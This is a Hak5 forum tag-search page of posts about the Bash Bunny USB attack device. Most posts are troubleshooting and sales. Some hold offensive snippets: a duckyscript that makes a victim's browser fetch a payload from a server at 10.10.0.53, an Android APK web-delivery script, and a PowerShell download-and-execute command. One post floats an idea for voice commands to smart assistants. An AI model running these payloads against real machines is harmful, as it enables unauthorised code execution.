Jump to content

Search the Community

Showing results for tags 'bash bunny'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Can everyone Tell me how i get the factory reset? The introduction from bash Bunny does not Work for the bash Bunny Mark 2.
  2. I just recieved my Bash Bunny MKII in the mail the other day and had used it for an nmap payload and it worked as I had hoped. However today I tried to use it on my laptop and it didn't work. I was hoping maybe it was just because I was using it on a different computer but I tried it on the computer I used it on originally and it doesn't work anymore. When I put the same payload in (off of the github payload library) and switch it to switch 1 or 2 and plug in the light goes solid green for a second but then no light and nothing happens. I tried resetting it with the suggested method however sadly nothing worked. Any suggestions?
  3. Looking to get my hands on a bash bunny but they seem to be sold out everywhere. Maybe I will have some luck in here. I am from the UK but will pay for shipping from USA also.
  4. Just throwing this out as an idea for a new device emulation for the bash bunny a USB microphone. With a new command to play an audio file stored on it. So you could plug it in to a smart device and in you audio file you have a voice say “Hey Google/Alexa/Siri/Cortana go to this site”, “Order 500 copy of ...” or “set alarm for 2am”.
  5. Hey I'm a 15 yr physical pen testing vet thats trying to branch out into the CS field. I just picked up a Bash Bunny and now im skunked as to what to do with it. The payloads I have found don't work on W10 or im doing something wrong. Please advise as to a great repository of pre config payloads thanks!
  6. My first payload: Watch THE movie in the terminal LED ATTACK ATTACKMODE HID QUACK CTRL-ALT t sleep 1 QUACK STRING "telnet towel.blinkenlights.nl" QUACK ENTER LED FINISH ATTACKMODE OFF https://github.com/internetblacksmith/bunnywars
  7. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its linux partition. I found a previous thread saying to delete the everything, change the version.txt file to an earlier version and run the updater but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to work
  8. Dear everyone, I am doing some experimenting with my new bash bunny and was wondering if once I enable an ATTACKMODE interface if it is possible to disable it after a little while without turning off the payload. For example I am trying ATTACKMODE HID STORAGE and then wondering if I can do something like DISABLE STORAGE or something of like that. I know to some of you this is probably going to seem like a stupid question but if anyone knows the answer can you please share. Thank you!!!
  9. Hi, I just bought my first Bash Bunny and tried to update it to 1.5 release. I read the docs about it, downloaded the updater and started it. Everything is going well, the download ends and the key blinks in red and blue. But once that's done, it becomes solid red and nothing else happens. My current version (version.txt): 1.3_267 I'm using Windows and don't have any other OS avalible right now. Thanks in advance for your your help, can't wait to use it!
  10. Hello, I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: DELAY 1000 ALT F2 DELAY 50 GUI SPACE GUI r DELAY 50 BACKSPACE DELAY 100 STRING http://10.10.0.53:8080/ ENTER This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0 autopwn.py
  11. Put together a quick and dirty bash bunny script. Allows unknown sources on Android device, grabs apk via webrowser, installs and opens. https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt Also working to get adb delivery method working. Curious if anyone knows of a Android keyboard shortcut that will quickly up settings to speed this up?
  12. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create: Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state) If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly. If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer, you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6 as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times which isn't ideal in every situation) #!/bin/bash LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET HOST_IP GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION if [ -z "${TARGET_IP}" ]; then LED FAIL2 exit 1 fi if [ ! -f Nswitch.txt ]; then echo 0 > Nswitch.txt fi LED STAGE1 #Detecting lockscreen tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping & # Windows OS specific, can change to RUN OSX or RUN UNITY RUN WIN ping $HOST_IP -n 1 sleep 1 if grep "ICMP" ping > /dev/null then echo 1 > lockscreen # Unlocked LED G DOUBLE #Try Captive portal to overcome some restrictions? python -m SimpleHTTPServer 80 & while ! nc -z localhost 80; do sleep 0.2; done else echo 0 > lockscreen # Locked LED R DOUBLE N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt fi cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1 with <form name=”web_form” id=”web_form” method=”post” action=”post.php”> <p><label>Nswitch:</label><input type=”number” name=”N” id=”N” /></p> <input type="submit" value="Ammend"> </form> and <?php $N = $_POST[‘N’]; $fp = fopen(”Nswitch.txt”, “a”); $savestring = $N; fwrite($savestring); fclose($fp); ?> It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.
  13. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create: Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state) If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly. If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer, you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6 as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times which isn't ideal in every situation) #!/bin/bash LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET HOST_IP GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION if [ -z "${TARGET_IP}" ]; then LED FAIL2 exit 1 fi if [ ! -f Nswitch.txt ]; then echo 0 > Nswitch.txt fi LED STAGE1 #Detecting lockscreen tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping & # Windows OS specific, can change to RUN OSX or RUN UNITY RUN WIN ping $HOST_IP -n 1 sleep 1 if grep "ICMP" ping > /dev/null then echo 1 > lockscreen # Unlocked LED G DOUBLE #Try Captive portal to overcome some restrictions? python -m SimpleHTTPServer 80 & while ! nc -z localhost 80; do sleep 0.2; done else echo 0 > lockscreen # Locked LED R DOUBLE N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt fi cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1 with <form name=”web_form” id=”web_form” method=”post” action=”post.php”> <p><label>Nswitch:</label><input type=”number” name=”N” id=”N” /></p> <input type="submit" value="Ammend"> </form> and <?php $N = $_POST[‘N’]; $fp = fopen(”Nswitch.txt”, “a”); $savestring = $N; fwrite($savestring); fclose($fp); ?> It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.  I should mention, that once you set the switch number N it will automatically copy the files of the directory from \payloads\switchN to the other switch (i.e switch 2 in the example above) and once you unplug the Bunny, change the switch and replug it, it will run the payload from switch N on switch 2.
  14. I am quite new to the world of hacking, and recently I have invested in the lan-turtle, and I was wondering what everyone's suggestions were on what Hak5 tool I should invest in next? '
  15. I'm selling my collection to fund a camera lens. To be frank, I simply do not have the time to play with these anymore. WiFi Pineapple Nano WiFi Pineapple IV Bash Bunny USB Rubber Ducky Throwing Star LAN Tap Kit Tactical Bag Selection of Antennas Cable Bag + connectorsComplete Kit Aluminium Carry Case Pineapple Juice Battery Pack ALFA usb network card J Link usb Network Card 8gb micro sd card I am based in the UK. I'm looking for sensible offers. I'm affraid this is sold as a bundle so will not be splitting it. £350 + shipping
  16. Not sure if this in the right place for this... What are the best defenses against this attack? I'm more interesting in logical controls that can be implemented to protect against this threat that physical ones.
  17. Hey guys, New to the forums, I have been playing with the bash bunny and so far I really think it rocks! One feature I would like to have is the option for a three device attack; HID, Mass Storage and RO Mass Storage. 1- HID for attack execution 2- Mass Storage for logging of attack result 3- RO Mass Storage for tools, such as installers etc Is this possible?
  18. While we all wait I thought I'd put together the Hak5 Kit To Rule Them All (it's a slow day in school today). Long Range USB WiFi Adapter $19.99 Micro Ethernet Switch $14.99 WiFi Pineapple - TETRA $199.99 WiFi Pineapple - NANO $99.99 Hak5 Field Kit Pocket Guide $19.99 WiFi Pineappling Book $12.00 LAN Turtle - LAN Turtle 3G $250.00 LAN Turtle - LAN Turtle SD $54.99 LAN Turtle - LAN Turtle Classic $44.99 USB Rubber Ducky - USB Rubber Ducky Deluxe $44.99 Bash Bunny $99.99 Packet Squirrel $59.99 SUBTOTAL: $921.90 Adapters & Cables: USB OTG adapter Micro USB Y-Cable USB A to USB C adapter USB A male to female extension Micro SD USB card reader Micro USB cables USB Ethernet adapter Retractable Ethernet cable Elite Hak5 Gear organizer Pair of Trust Your Technolust key-ring flight tags Anker PowerCore+ 13400 USB Battery SUBTOTAL: $????
  19. After following the guide for 'unblocking' my bash bunny, I have been unable to install any of the tools. I have verified the tools are not installed by looking in the tools folder on the lines side and using payloads that require specific tools like Responder. I've gone through the standard instructions for installing tools... put the bash dummy in arming mode, transfer the files into the 'tools' folder, safely eject, and reinsert while still in arming mode. When I do this, the bash bunny just boots like normal. The led never goes magenta and the files are still in the 'tools' folder. Any payload that requires a specific tool will fail. Thoughts? Suggestions? Any help would be appreciated.
  20. Is there any way can i control winbox by bash bunny ? i don't know where the winbox is. 1si i need to search it than... control it.. by bash bunny .. can i do it ? with PowerShell or cmd ? Thanks :)
  21. Capsos

    No Loot

    Happy New Year All Been checking the updates with the auto updater and new payloads. Ive ran a few on a older laptop i use for training encase i Fook it up..... Well ive tried a few of them now and all the RGB flash to the correct sequence. I have tried it with the Laptop in locked and unlocked and neither time when i check i have a empty loot folder !! Any ideas ? I have tried disabling my Security protection just in case but still nothing ! Thanks in advance
  22. Hey all I have got a new Bashbunny and plugged it into a USB2 port in switch possion 1 and windows started to install Usb composite device READY CDC Serial NO DRIVER FOUND USB Mass Storage Device READY USB Device READY. Where can I find the CDC driver ?
  23. So ive been trying to run ducky script in a bash bunny payload but as soon as it hits the ducky script it stops. LED SETUP GET SWITCH_POSITION ATTACKMODE HID LED ATTACK RUN WIN notepad.exe QUACK DELAY 300 QUACK STRING (\___/) QUACK ENTER QUACK DELAY 300 QUACK STRING (='.'=) QUACK ENTER QUACK DELAY 300 QUACK STRING (")_(") QUACK DELAY 300 I cant figure out the problem
  24. So I have been experimenting with my bash bunny and preparing it for a windows 7 powershell download file and execute. I am in a virtualbox so that may be the problem! So inside the powershell command I use () and : windows 7 cmd translates "(" to 9 and ")" to 0 and ":" to ; and all uppercase things are typed as lowercase. the command: Q STRING "powershell(new-object net.webclient).DownloadFile('xxx','xxx'); " Some more issues is that the URL am downloading has Uppercase characters which are not bring typed into the cmd. Thanks in advance and HACK THE PLANET ~~0x5a
  25. I tried updating my bashbunny to 1.4 today, and it was going well.. Then, after i ejected it and put it back in to start the update it started flashing a "police" pattern. I am back on version 1.0 and no matter what update i download, i am not able to go up. I would really like some help... I don't understand what is wrong.
×
×
  • Create New...